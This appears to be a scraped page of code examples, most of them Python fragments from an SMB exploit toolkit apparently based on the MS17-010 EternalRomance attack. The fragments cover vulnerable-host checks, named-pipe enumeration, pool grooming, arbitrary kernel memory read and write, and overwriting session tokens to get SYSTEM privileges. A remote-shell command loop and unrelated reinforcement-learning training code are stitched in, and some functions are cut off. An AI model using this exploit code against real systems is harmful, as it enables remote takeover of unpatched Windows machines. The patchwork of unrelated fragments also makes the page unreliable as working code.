def worawit():
	target = args.target
	logger.blue('Connecting to: [{}]'.format(logger.BLUE(args.target)))

	if args.pipe:
		pipe_name = args.pipe
		logger.blue('Using specified pipe: [{}]'.format(logger.BLUE(args.pipe)))
	else:
		pipe_name = None	

	try:
		exploit(target, pipe_name)
		logger.green('FINISHED!')
	except:
		logger.red('Could not connect to: [{}]'.format(logger.RED(target)))
def worawit(target):
	try:
		logger.blue('Connecting to: [{}]'.format(logger.BLUE(target)))
		try:
			conn = MYSMB(target, timeout=5)
		except:
			logger.red('Failed to connect to [{}]'.format(logger.RED(target)))
			return False
		try:
			conn.login(USERNAME, PASSWORD)
		except:
			logger.red('Authentication failed: [{}]'.format(logger.RED(nt_errors.ERROR_MESSAGES[e.error_code][0])))
			quit()
		finally:
			logger.blue('Got OS: [{}]'.format(logger.BLUE(conn.get_server_os())))

		tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$')
		conn.set_default_tid(tid)

		# test if target is vulnerable
		TRANS_PEEK_NMPIPE = 0x23
		recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE), maxParameterCount=0xffff, maxDataCount=0x800)
		status = recvPkt.getNTStatus()
		if status == 0xC0000205:  # STATUS_INSUFF_SERVER_RESOURCES
			logger.green('[{}] IS NOT PATCHED!'.format(logger.GREEN(target)))
		else:
			logger.red('[{}] IS PATCHED!'.format(logger.RED(target)))
			quit()

		logger.blue('Checking named pipes...')
		for pipe_name, pipe_uuid in pipes.items():
			try:
				dce = conn.get_dce_rpc(pipe_name)
				dce.connect()
				try:
					dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax)
					logger.green('\t-\t{}: OK (64 bit)'.format(logger.GREEN(pipe_name)))
				except DCERPCException as e:
					if 'transfer_syntaxes_not_supported' in str(e):
						logger.green('\t-\t{}: OK (32 bit)'.format(logger.GREEN(pipe_name)))
					else:
						logger.green('\t-\t{}: OK ({})'.format(logger.GREEN(pipe_name), str(e)))
				dce.disconnect()
			except smb.SessionError as e:
				logger.red('{}: {}'.format(logger.RED(pipe_name), logger.RED(nt_errors.ERROR_MESSAGES[e.error_code][0])))
			except smbconnection.SessionError as e:
				logger.red('{}: {}'.format(logger.RED(pipe_name), logger.RED(nt_errors.ERROR_MESSAGES[e.error][0])))

		conn.disconnect_tree(tid)
		conn.logoff()
		conn.get_socket().close()
	except (KeyboardInterrupt, SystemExit):
		logger.red('Keyboard interrupt received..')
		quit()
Exemple #3
0
def run():
	target = args.target

	if args.user:
		if args.password == None:
			logger.red('Please specify username and password')
			quit()
		else:
			username = args.user
			password = args.password
	else:
		username = ''

	if args.password:
		if args.user == None:
			logger.red('Please specify username and password')
			quit()
		else:
			username = args.user
			password = args.password
	else:
		password = ''

	if args.domain:
		domain = args.domain
	else:
		domain = ''

	if args.pipe:
		pipe_name = args.pipe
		logger.blue('Using specified pipe: [{}]'.format(logger.BLUE(args.pipe)))
	else:
		pipe_name = None	

	try:
		result = exploit(target,username,password,pipe_name)
	except Exception as e:
		logger.red(str(e))
		quit()
	if result:
		logger.green('Exploit finished!')
	else:
		logger.red('Failed to finish exploit')
def exploit(target, pipe_name):

	conn = MYSMB(target)
	
	# set NODELAY to make exploit much faster
	conn.get_socket().setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)

	info = {}

	conn.login(USERNAME, PASSWORD, maxBufferSize=4356)
	server_os = conn.get_server_os()
	logger.blue('OS: {}'.format(logger.BLUE(server_os)))

	if server_os.startswith("Windows 7 ") or server_os.startswith("Windows Server 2008 R2"):
		info['os'] = 'WIN7'
		info['method'] = exploit_matched_pairs
	elif server_os.startswith("Windows 8") or server_os.startswith("Windows Server 2012 ") or server_os.startswith("Windows Server 2016 ") or server_os.startswith("Windows 10") or server_os.startswith("Windows RT 9200"):
		info['os'] = 'WIN8'
		info['method'] = exploit_matched_pairs
	elif server_os.startswith("Windows Server (R) 2008") or server_os.startswith("Windows Vista") or server_os.startswith("Windows (R) Web Server 2008"):
		info['os'] = 'WIN7'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows Server 2003 "):
		info['os'] = 'WIN2K3'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows 5.1"):
		info['os'] = 'WINXP'
		info['arch'] = 'x86'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows XP "):
		info['os'] = 'WINXP'
		info['arch'] = 'x64'
		info['method'] = exploit_fish_barrel
	elif server_os.startswith("Windows 5.0"):
		info['os'] = 'WIN2K'
		info['arch'] = 'x86'
		info['method'] = exploit_fish_barrel
	else:
		logger.red('Target isnt supported...')
		quit()
	
	if pipe_name is None:
		pipe_name = find_named_pipe(conn)
		if pipe_name is None:
			logger.red('Couldnt get named pipe...')
			return False
		logger.green('Using pipe: [{}]'.format(pipe_name))

	if not info['method'](conn, pipe_name, info):
		return False

	# Now, read_data() and write_data() can be used for arbitrary read and write.
	# ================================
	# Modify this SMB session to be SYSTEM
	# ================================	
	fmt = info['PTR_FMT']
	
	logger.blue('Creating SYSTEM Session')
	# IsNullSession = 0, IsAdmin = 1
	write_data(conn, info, info['session']+info['SESSION_ISNULL_OFFSET'], '\x00\x01')

	# read session struct to get SecurityContext address
	sessionData = read_data(conn, info, info['session'], 0x100)
	secCtxAddr = unpack_from('<'+fmt, sessionData, info['SESSION_SECCTX_OFFSET'])[0]

	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
		# Windows 2003 and earlier uses only ImpersonateSecurityContext() (with PCtxtHandle struct) for impersonation
		# Modifying token seems to be difficult. But writing kernel shellcode for all old Windows versions is
		# much more difficult because data offset in ETHREAD/EPROCESS is different between service pack.
		
		# find the token and modify it
		if 'SECCTX_PCTXTHANDLE_OFFSET' in info:
			pctxtDataInfo = read_data(conn, info, secCtxAddr+info['SECCTX_PCTXTHANDLE_OFFSET'], 8)
			pctxtDataAddr = unpack_from('<'+fmt, pctxtDataInfo)[0]
		else:
			pctxtDataAddr = secCtxAddr

		tokenAddrInfo = read_data(conn, info, pctxtDataAddr+info['PCTXTHANDLE_TOKEN_OFFSET'], 8)
		tokenAddr = unpack_from('<'+fmt, tokenAddrInfo)[0]
		logger.blue('Current Token Addr: 0x{:x}'.format(tokenAddr))
		
		# copy Token data for restoration
		tokenData = read_data(conn, info, tokenAddr, 0x40*info['PTR_SIZE'])
		
		# parse necessary data out of token
		userAndGroupsAddr, userAndGroupCount, userAndGroupsAddrOffset, userAndGroupCountOffset = get_group_data_from_token(info, tokenData)

		logger.blue('Overwriting Token [UserAndGroups]')
		# modify UserAndGroups info
		fakeUserAndGroupCount, fakeUserAndGroups = create_fake_SYSTEM_UserAndGroups(conn, info, userAndGroupCount, userAndGroupsAddr)
		if fakeUserAndGroupCount != userAndGroupCount:
			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', fakeUserAndGroupCount))
		write_data(conn, info, userAndGroupsAddr, fakeUserAndGroups)
	else:
		# the target can use PsImperonateClient for impersonation (Windows 2008 and later)
		# copy SecurityContext for restoration
		secCtxData = read_data(conn, info, secCtxAddr, info['SECCTX_SIZE'])

		logger.blue('Overwriting session security context')
		# see FAKE_SECCTX detail at top of the file
		write_data(conn, info, secCtxAddr, info['FAKE_SECCTX'])

	# ================================
	# do whatever we want as SYSTEM over this SMB connection
	# ================================	
	# try:
	smb_pwn(conn, info['arch'])
	# except:
	# 	pass

	# restore SecurityContext/Token
	if 'PCTXTHANDLE_TOKEN_OFFSET' in info:
		userAndGroupsOffset = userAndGroupsAddr - tokenAddr
		write_data(conn, info, userAndGroupsAddr, tokenData[userAndGroupsOffset:userAndGroupsOffset+len(fakeUserAndGroups)])
		if fakeUserAndGroupCount != userAndGroupCount:
			write_data(conn, info, tokenAddr+userAndGroupCountOffset, pack('<I', userAndGroupCount))
	else:
		write_data(conn, info, secCtxAddr, secCtxData)

	conn.disconnect_tree(conn.get_tid())
	conn.logoff()
	conn.get_socket().close()
	return True
def exploit_fish_barrel(conn, pipe_name, info):
	# for Windows Vista/2008 and earlier
	
	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
	conn.set_default_tid(tid)
	# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
	fid = conn.nt_create_andx(tid, pipe_name)
	info['fid'] = fid

	if info['os'] == 'WIN7' and 'arch' not in info:
		# leak_frag_size() can be used against Windows Vista/2008 to determine target architecture
		info.update(leak_frag_size(conn, tid, fid))
	
	if 'arch' in info:
		# add os and arch specific exploit info
		info.update(OS_ARCH_INFO[info['os']][info['arch']])
		attempt_list = [ OS_ARCH_INFO[info['os']][info['arch']] ]
	else:
		# do not know target architecture
		# this case is only for Windows 2003
		# try offset of 64 bit then 32 bit because no target architecture
		attempt_list = [ OS_ARCH_INFO[info['os']]['x64'], OS_ARCH_INFO[info['os']]['x86'] ]
	
	# ================================
	# groom packets
	# ================================
	# sum of transaction name, parameters and data length is 0x1000
	# paramterCount = 0x100-TRANS_NAME_LEN
	logger.blue('Groom Packets')
	trans_param = pack('<HH', info['fid'], 0)
	for i in range(12):
		mid = info['fid'] if i == 8 else next_extra_mid()
		conn.send_trans('', mid=mid, param=trans_param, totalParameterCount=0x100-TRANS_NAME_LEN, totalDataCount=0xec0, maxParameterCount=0x40, maxDataCount=0)	
	
	# expected transactions alignment
	#
	#    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
	#    |  mid=mid1 |  mid=mid2 |             |  mid=mid8 |  mid=fid  |  mid=mid9 | mid=mid10 | mid=mid11 |
	#    +-----------+-----------+-----...-----+-----------+-----------+-----------+-----------+-----------+
	#                                                         trans1       trans2

	# ================================
	# shift transaction Indata ptr with SmbWriteAndX
	# ================================
	shift_indata_byte = 0x200
	conn.do_write_andx_raw_pipe(info['fid'], 'A'*shift_indata_byte)
	
	# ================================
	# Dangerous operation: attempt to control one transaction
	# ================================
	# Note: POOL_ALIGN value is same as heap alignment value
	success = False
	for tinfo in attempt_list:
		logger.blue('Attempting to control next transaction ' + tinfo['ARCH'])

		HEAP_CHUNK_PAD_SIZE = (tinfo['POOL_ALIGN'] - (tinfo['TRANS_SIZE']+HEAP_HDR_SIZE) % tinfo['POOL_ALIGN']) % tinfo['POOL_ALIGN']
		NEXT_TRANS_OFFSET = 0xf00 - shift_indata_byte + HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE

		# Below operation is dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
		conn.send_trans_secondary(mid=info['fid'], data='\x00', dataDisplacement=NEXT_TRANS_OFFSET+tinfo['TRANS_MID_OFFSET'])
		wait_for_request_processed(conn)

		# if the overwritten is correct, a modified transaction mid should be special_mid now.
		# a new transaction with special_mid should be error.
		recvPkt = conn.send_nt_trans(5, mid=special_mid, param=trans_param, data='')
		if recvPkt.getNTStatus() == 0x10002:  # invalid SMB
			logger.green('Successfully controlled one transaction!')
			success = True
			if 'arch' not in info:
				logger.blue('Target is '+tinfo['ARCH'])
				info['arch'] = tinfo['ARCH']
				info.update(OS_ARCH_INFO[info['os']][info['arch']])
			break
		if recvPkt.getNTStatus() != 0:
			logger.red('Unexpected Return Status: [0x{:x}]'.format(recvPkt.getNTStatus()))
	
	if not success:
		logger.red('Unexpected Return Status: 0x{:x}'.format(recvPkt.getNTStatus()))
		logger.red('May have written to the wrong place')
		logger.red('Target may have crashed...')
		return False


	# NSA eternalromance modify transaction RefCount to keep controlled and reuse transaction after leaking info.
	# This is easy to to but the modified transaction will never be freed. The next exploit attempt might be harder
	#   because of this unfreed memory chunk. I will avoid it.
	
	# From a picture above, now we can only control trans2 by trans1 data. Also we know only offset of these two 
	# transactions (do not know the address).
	# After reading memory by modifying and completing trans2, trans2 cannot be used anymore.
	# To be able to use trans1 after trans2 is gone, we need to modify trans1 to be able to modify itself.
	# To be able to modify trans1 struct, we need to use trans2 param or data but write backward.
	# On 32 bit target, we can write to any address if parameter count is 0xffffffff.
	# On 64 bit target, modifying paramter count is not enough because address size is 64 bit. Because our transactions
	#   are allocated with RtlAllocateHeap(), the HIDWORD of InParameter is always 0. To be able to write backward with offset only,
	#   we also modify HIDWORD of InParameter to 0xffffffff.
	
	logger.blue('Modifying parameter count to 0xffffffff to write backwards')
	conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
	# on 64 bit, modify InParameter last 4 bytes to \xff\xff\xff\xff too
	if info['arch'] == 'x64':
		conn.send_trans_secondary(mid=info['fid'], data='\xff'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
	wait_for_request_processed(conn)
	
	TRANS_CHUNK_SIZE = HEAP_HDR_SIZE + info['TRANS_SIZE'] + 0x1000 + HEAP_CHUNK_PAD_SIZE
	PREV_TRANS_DISPLACEMENT = TRANS_CHUNK_SIZE + info['TRANS_SIZE'] + TRANS_NAME_LEN
	PREV_TRANS_OFFSET = 0x100000000 - PREV_TRANS_DISPLACEMENT

	# modify paramterCount of first transaction
	conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_TOTALPARAMCNT_OFFSET'])
	if info['arch'] == 'x64':
		conn.send_nt_trans_secondary(mid=special_mid, param='\xff'*4, paramDisplacement=PREV_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
		# restore trans2.InParameters pointer before leaking next transaction
		conn.send_trans_secondary(mid=info['fid'], data='\x00'*4, dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_INPARAM_OFFSET']+4)
	wait_for_request_processed(conn)

	# ================================
	# leak transaction
	# ================================
	logger.blue('Leaking next transaction')
	# modify TRANSACTION member to leak info
	# function=5 (NT_TRANS_RENAME)
	conn.send_trans_secondary(mid=info['fid'], data='\x05', dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_FUNCTION_OFFSET'])
	# parameterCount, totalParameterCount, maxParameterCount, dataCount, totalDataCount
	conn.send_trans_secondary(mid=info['fid'], data=pack('<IIIII', 4, 4, 4, 0x100, 0x100), dataDisplacement=NEXT_TRANS_OFFSET+info['TRANS_PARAMCNT_OFFSET'])

	conn.send_nt_trans_secondary(mid=special_mid)
	leakData = conn.recv_transaction_data(special_mid, 0x100)
	leakData = leakData[4:]  # remove param
	#open('leak.dat', 'wb').write(leakData)

	# check heap chunk size value in leak data
	if unpack_from('<H', leakData, HEAP_CHUNK_PAD_SIZE)[0] != (TRANS_CHUNK_SIZE // info['POOL_ALIGN']):
		logger.red('Chunk size is wrong...')
		return False

	# extract leak transaction data and make next transaction to be trans2
	leakTranOffset = HEAP_CHUNK_PAD_SIZE + HEAP_HDR_SIZE
	leakTrans = leakData[leakTranOffset:]
	fmt = info['PTR_FMT']
	_, connection_addr, session_addr, treeconnect_addr, flink_value = unpack_from('<'+fmt*5, leakTrans, 8)
	inparam_value, outparam_value, indata_value = unpack_from('<'+fmt*3, leakTrans, info['TRANS_INPARAM_OFFSET'])
	trans2_mid = unpack_from('<H', leakTrans, info['TRANS_MID_OFFSET'])[0]
	
	logger.blue('Connection: 0x{:x}'.format(connection_addr))
	logger.blue('Session: 0x{:x}'.format(session_addr))
	logger.blue('Flink: 0x{:x}'.format(flink_value))
	logger.blue('InData: 0x{:x}'.format(indata_value))
	logger.blue('MID: 0x{:x}'.format(trans2_mid))
	
	trans2_addr = inparam_value - info['TRANS_SIZE'] - TRANS_NAME_LEN
	trans1_addr = trans2_addr - TRANS_CHUNK_SIZE * 2
	logger.blue('Trans1: 0x{:x}'.format(trans1_addr))
	logger.blue('Trans2: 0x{:x}'.format(trans2_addr))
	
	# ================================
	# modify trans struct to be used for arbitrary read/write
	# ================================
	logger.blue('modify transaction struct for arbitrary read/write')
	# modify
	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
	# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
	# Note: HIDWORD of trans1.InParameter is still 0xffffffff
	TRANS_OFFSET = 0x100000000 - (info['TRANS_SIZE'] + TRANS_NAME_LEN)
	conn.send_nt_trans_secondary(mid=info['fid'], param=pack('<'+fmt*3, trans1_addr, trans1_addr+0x200, trans2_addr), paramDisplacement=TRANS_OFFSET+info['TRANS_INPARAM_OFFSET'])
	wait_for_request_processed(conn)
	
	# modify trans1.mid
	trans1_mid = conn.next_mid()
	conn.send_trans_secondary(mid=info['fid'], param=pack('<H', trans1_mid), paramDisplacement=info['TRANS_MID_OFFSET'])
	wait_for_request_processed(conn)
	
	info.update({
		'connection': connection_addr,
		'session': session_addr,
		'trans1_mid': trans1_mid,
		'trans1_addr': trans1_addr,
		'trans2_mid': trans2_mid,
		'trans2_addr': trans2_addr,
	})
	return True
def exploit_matched_pairs(conn, pipe_name, info):
	# for Windows 7/2008 R2 and later
	
	tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
	conn.set_default_tid(tid)
	# fid for first open is always 0x4000. We can open named pipe multiple times to get other fids.
	fid = conn.nt_create_andx(tid, pipe_name)
	
	info.update(leak_frag_size(conn, tid, fid))
	# add os and arch specific exploit info
	info.update(OS_ARCH_INFO[info['os']][info['arch']])
	
	# groom: srv buffer header
	info['GROOM_POOL_SIZE'] = calc_alloc_size(GROOM_TRANS_SIZE + info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'], info['POOL_ALIGN'])
	logger.blue('GROOM_POOL_SIZE: 0x{:x}'.format(info['GROOM_POOL_SIZE']))
	# groom paramters and data is alignment by 8 because it is NT_TRANS
	info['GROOM_DATA_SIZE'] = GROOM_TRANS_SIZE - TRANS_NAME_LEN - 4 - info['TRANS_SIZE']  # alignment (4)

	# bride: srv buffer header, pool header (same as pool align size), empty transaction name (4)
	bridePoolSize = 0x1000 - (info['GROOM_POOL_SIZE'] & 0xfff) - info['FRAG_POOL_SIZE']
	info['BRIDE_TRANS_SIZE'] = bridePoolSize - (info['SRV_BUFHDR_SIZE'] + info['POOL_ALIGN'])
	logger.blue('BRIDE_TRANS_SIZE: 0x{:x}'.format(info['BRIDE_TRANS_SIZE']))
	# bride paramters and data is alignment by 4 because it is TRANS
	info['BRIDE_DATA_SIZE'] = info['BRIDE_TRANS_SIZE'] - TRANS_NAME_LEN - info['TRANS_SIZE']
	
	# ================================
	# try align pagedpool and leak info until satisfy
	# ================================
	leakInfo = None
	# max attempt: 10
	for i in range(10):
		reset_extra_mid(conn)
		leakInfo = align_transaction_and_leak(conn, tid, fid, info)
		if leakInfo is not None:
			break
		logger.red('Leak failed! Retrying...')
		conn.close(tid, fid)
		conn.disconnect_tree(tid)
		
		tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
		conn.set_default_tid(tid)
		fid = conn.nt_create_andx(tid, pipe_name)

	if leakInfo is None:
		return False
	
	info['fid'] = fid
	info.update(leakInfo)

	# ================================
	# shift transGroom.Indata ptr with SmbWriteAndX
	# ================================
	shift_indata_byte = 0x200
	conn.do_write_andx_raw_pipe(fid, 'A'*shift_indata_byte)

	# Note: Even the distance between bride transaction is exactly what we want, the groom transaction might be in a wrong place.
	#       So the below operation is still dangerous. Write only 1 byte with '\x00' might be safe even alignment is wrong.
	# maxParameterCount (0x1000), trans name (4), param (4)
	indata_value = info['next_page_addr'] + info['TRANS_SIZE'] + 8 + info['SRV_BUFHDR_SIZE'] + 0x1000 + shift_indata_byte
	indata_next_trans_displacement = info['trans2_addr'] - indata_value
	conn.send_nt_trans_secondary(mid=fid, data='\x00', dataDisplacement=indata_next_trans_displacement + info['TRANS_MID_OFFSET'])
	wait_for_request_processed(conn)

	# if the overwritten is correct, a modified transaction mid should be special_mid now.
	# a new transaction with special_mid should be error.
	recvPkt = conn.send_nt_trans(5, mid=special_mid, param=pack('<HH', fid, 0), data='')
	if recvPkt.getNTStatus() != 0x10002:  # invalid SMB
		logger.red('Unexpected return status: [0x{:x}]'.format(recvPkt.getNTStatus()))
		logger.red('Written to wrong place')
		logger.red('Target may have crashed...')
		return False

	logger.green('Successfully controlled the Groom Transaction')

	# NSA exploit set refCnt on leaked transaction to very large number for reading data repeatly
	# but this method make the transation never get freed
	# I will avoid memory leak
	
	# ================================
	# modify trans1 struct to be used for arbitrary read/write
	# ================================
	logger.blue('Modifying Trans1 Struct for Read/Write')
	fmt = info['PTR_FMT']
	# use transGroom to modify trans2.InData to &trans1. so we can modify trans1 with trans2 data
	conn.send_nt_trans_secondary(mid=fid, data=pack('<'+fmt, info['trans1_addr']), dataDisplacement=indata_next_trans_displacement + info['TRANS_INDATA_OFFSET'])
	wait_for_request_processed(conn)

	# modify
	# - trans1.InParameter to &trans1. so we can modify trans1 struct with itself (trans1 param)
	# - trans1.InData to &trans2. so we can modify trans2 with trans1 data
	conn.send_nt_trans_secondary(mid=special_mid, data=pack('<'+fmt*3, info['trans1_addr'], info['trans1_addr']+0x200, info['trans2_addr']), dataDisplacement=info['TRANS_INPARAM_OFFSET'])
	wait_for_request_processed(conn)

	# modify trans2.mid
	info['trans2_mid'] = conn.next_mid()
	conn.send_nt_trans_secondary(mid=info['trans1_mid'], data=pack('<H', info['trans2_mid']), dataDisplacement=info['TRANS_MID_OFFSET'])
	return True
Exemple #7
0
def worawit(target):
    try:
        try:
            conn = MYSMB(target, timeout=5)
        except:
            logger.red('Unable to connect to [{}]'.format(logger.RED(target)))
            return False
        try:
            conn.login(USERNAME, PASSWORD)
        except:
            logger.red('Failed to authenticate to [{}]'.format(
                logger.RED(target)))
            return False
        finally:
            try:
                OS = conn.get_server_os()
            except Exception as e:
                logger.red(str(e))
                return False

        tid = conn.tree_connect_andx('\\\\' + target + '\\' + 'IPC$')
        conn.set_default_tid(tid)

        # test if target is vulnerable
        TRANS_PEEK_NMPIPE = 0x23
        recvPkt = conn.send_trans(pack('<H', TRANS_PEEK_NMPIPE),
                                  maxParameterCount=0xffff,
                                  maxDataCount=0x800)
        status = recvPkt.getNTStatus()
        if status == 0xC0000205:  # STATUS_INSUFF_SERVER_RESOURCES
            logger.green('[%s] VULNERABLE' % logger.GREEN(target))
            vulnerable[target] = []
        else:
            logger.red('[%s] PATCHED' % logger.RED(target))

        pipes_found = []

        for pipe_name, pipe_uuid in pipes.items():
            try:
                dce = conn.get_dce_rpc(pipe_name)
                dce.connect()
                try:
                    dce.bind(pipe_uuid, transfer_syntax=NDR64Syntax)
                    try:
                        pipes_found.append(pipe_name)
                    except:
                        pass
                except DCERPCException as e:
                    if 'transfer_syntaxes_not_supported' in str(e):
                        try:
                            pipes_found.append(pipe_name)
                        except:
                            pass
                    else:
                        try:
                            pipes_found.append(pipe_name)
                        except:
                            pass
                dce.disconnect()
                vulnerable[target] = pipes_found
            except smb.SessionError as e:
                continue
            except smbconnection.SessionError as e:
                continue

        conn.disconnect_tree(tid)
        conn.logoff()
        conn.get_socket().close()
    except KeyboardInterrupt:
        logger.red('Keyboard interrupt received..')
        quit()
Exemple #8
0
def set_server_path(path):
    global server_path
    server_path = path


def get_server_path():
    return server_path


send_data(client, "cd .")
commands["cd"]["function"]("cd .", recv_data(client))

while 1:
    command = raw_input(
        red(sysinfo[5]) + yellow("@") + blue(sysinfo[1]) +
        yellow(":" + get_server_path()) + green("> "))
    if command.strip() == "":
        continue

    keyword = command.split(" ")[0]
    try:
        if run_custom(keyword, command):
            continue

        if command == "show_output":
            print prev_data
            continue

        send_data(client, transform_cmd(keyword, command))
        if command.lower() == "exit":
            s.close()
def train():
    from linear_schedule import Linear

    ledger = defaultdict(lambda: MovingAverage(Reporting.reward_average))

    M.config(file=os.path.join(RUN.log_directory, RUN.log_file))
    M.diff()

    with U.make_session(
            RUN.num_cpu), Logger(RUN.log_directory) as logger, contextify(
                gym.make(G.env_name)) as env:
        env = ScaledFloatFrame(wrap_dqn(env))

        if G.seed is not None:
            env.seed(G.seed)
        logger.log_params(G=vars(G), RUN=vars(RUN), Reporting=vars(Reporting))
        inputs = TrainInputs(action_space=env.action_space,
                             observation_space=env.observation_space)
        trainer = QTrainer(inputs=inputs,
                           action_space=env.action_space,
                           observation_space=env.observation_space)
        if G.prioritized_replay:
            replay_buffer = PrioritizedReplayBuffer(size=G.buffer_size,
                                                    alpha=G.alpha)
        else:
            replay_buffer = ReplayBuffer(size=G.buffer_size)

        class schedules:
            # note: it is important to have this start from the begining.
            eps = Linear(G.n_timesteps * G.exploration_fraction, 1,
                         G.final_eps)
            if G.prioritized_replay:
                beta = Linear(G.n_timesteps - G.learning_start, G.beta_start,
                              G.beta_end)

        U.initialize()
        trainer.update_target()
        x = np.array(env.reset())
        ep_ind = 0
        M.tic('episode')
        for t_step in range(G.n_timesteps):
            # schedules
            eps = 0 if G.param_noise else schedules.eps[t_step]
            if G.prioritized_replay:
                beta = schedules.beta[t_step - G.learning_start]

            x0 = x
            M.tic('sample', silent=True)
            (action, *_), action_q, q = trainer.runner.act([x], eps)
            x, rew, done, info = env.step(action)
            ledger['action_q_value'].append(action_q.max())
            ledger['action_q_value/mean'].append(action_q.mean())
            ledger['action_q_value/var'].append(action_q.var())
            ledger['q_value'].append(q.max())
            ledger['q_value/mean'].append(q.mean())
            ledger['q_value/var'].append(q.var())
            ledger['timing/sample'].append(M.toc('sample', silent=True))
            # note: adding sample to the buffer is identical between the prioritized and the standard replay strategy.
            replay_buffer.add(s0=x0,
                              action=action,
                              reward=rew,
                              s1=x,
                              done=float(done))

            logger.log(
                t_step, {
                    'q_value': ledger['q_value'].latest,
                    'q_value/mean': ledger['q_value/mean'].latest,
                    'q_value/var': ledger['q_value/var'].latest,
                    'q_value/action': ledger['action_q_value'].latest,
                    'q_value/action/mean':
                    ledger['action_q_value/mean'].latest,
                    'q_value/action/var': ledger['action_q_value/var'].latest
                },
                action=action,
                eps=eps,
                silent=True)

            if G.prioritized_replay:
                logger.log(t_step, beta=beta, silent=True)

            if done:
                ledger['timing/episode'].append(M.split('episode',
                                                        silent=True))
                ep_ind += 1
                x = np.array(env.reset())
                ledger['rewards'].append(info['total_reward'])

                silent = (ep_ind % Reporting.print_interval != 0)
                logger.log(t_step,
                           timestep=t_step,
                           episode=green(ep_ind),
                           total_reward=ledger['rewards'].latest,
                           episode_length=info['timesteps'],
                           silent=silent)
                logger.log(t_step, {
                    'total_reward/mean':
                    yellow(ledger['rewards'].mean, lambda v: f"{v:.1f}"),
                    'total_reward/max':
                    yellow(ledger['rewards'].max, lambda v: f"{v:.1f}"),
                    "time_spent_exploring":
                    default(eps, percent),
                    "timing/episode":
                    green(ledger['timing/episode'].latest, sec),
                    "timing/episode/mean":
                    green(ledger['timing/episode'].mean, sec),
                },
                           silent=silent)
                try:
                    logger.log(t_step, {
                        "timing/sample":
                        default(ledger['timing/sample'].latest, sec),
                        "timing/sample/mean":
                        default(ledger['timing/sample'].mean, sec),
                        "timing/train":
                        default(ledger['timing/train'].latest, sec),
                        "timing/train/mean":
                        green(ledger['timing/train'].mean, sec),
                        "timing/log_histogram":
                        default(ledger['timing/log_histogram'].latest, sec),
                        "timing/log_histogram/mean":
                        default(ledger['timing/log_histogram'].mean, sec)
                    },
                               silent=silent)
                    if G.prioritized_replay:
                        logger.log(t_step, {
                            "timing/update_priorities":
                            default(ledger['timing/update_priorities'].latest,
                                    sec),
                            "timing/update_priorities/mean":
                            default(ledger['timing/update_priorities'].mean,
                                    sec)
                        },
                                   silent=silent)
                except Exception as e:
                    pass
                if G.prioritized_replay:
                    logger.log(
                        t_step,
                        {"replay_beta": default(beta, lambda v: f"{v:.2f}")},
                        silent=silent)

            # note: learn here.
            if t_step >= G.learning_start and t_step % G.learn_interval == 0:
                if G.prioritized_replay:
                    experiences, weights, indices = replay_buffer.sample(
                        G.replay_batch_size, beta)
                    logger.log_histogram(t_step, weights=weights)
                else:
                    experiences, weights = replay_buffer.sample(
                        G.replay_batch_size), None
                M.tic('train', silent=True)
                x0s, actions, rewards, x1s, dones = zip(*experiences)
                td_error_val, loss_val = trainer.train(s0s=x0s,
                                                       actions=actions,
                                                       rewards=rewards,
                                                       s1s=x1s,
                                                       dones=dones,
                                                       sample_weights=weights)
                ledger['timing/train'].append(M.toc('train', silent=True))
                M.tic('log_histogram', silent=True)
                logger.log_histogram(t_step, td_error=td_error_val)
                ledger['timing/log_histogram'].append(
                    M.toc('log_histogram', silent=True))
                if G.prioritized_replay:
                    M.tic('update_priorities', silent=True)
                    new_priorities = np.abs(td_error_val) + eps
                    replay_buffer.update_priorities(indices, new_priorities)
                    ledger['timing/update_priorities'].append(
                        M.toc('update_priorities', silent=True))

            if t_step % G.target_network_update_interval == 0:
                trainer.update_target()

            if t_step % Reporting.checkpoint_interval == 0:
                U.save_state(os.path.join(RUN.log_directory, RUN.checkpoint))
Exemple #10
0
def run(target):
    try:
        try:
            logger.verbose('Attempting to connect to %s' % logger.BLUE(target))
            conn = MYSMB(target, timeout=5)
            logger.verbose('Successfully connected to %s' %
                           logger.BLUE(target))
        except Exception as e:
            logger.red('Failed to connect to [{}]'.format(logger.RED(target)))
            logger.verbose('Got error whilst connecting: %s' %
                           logger.BLUE(str(e)))
            return False
        try:
            # login(self, user, password, domain='', lmhash='', nthash='', ntlm_fallback=True, maxBufferSize=None)
            # can add passthehash at some point
            logger.verbose('Attempting to authenticate to %s' %
                           logger.BLUE(target))
            conn.login(username, password, domain)
            logger.verbose('Successfully authenticated to %s' %
                           logger.BLUE(target))
        except Exception as e:
            logger.red('Failed to authenticate to [{}]'.format(
                logger.RED(target)))
            return False
        try:
            logger.verbose('Attempting to get OS for %s' % logger.BLUE(target))
            OS = conn.get_server_os()
            logger.verbose('Got Operting System: %s' % logger.BLUE(OS))
        except Exception as e:
            logger.verbose('Got error whilst getting Operting System: %s' %
                           logger.BLUE(str(e)))
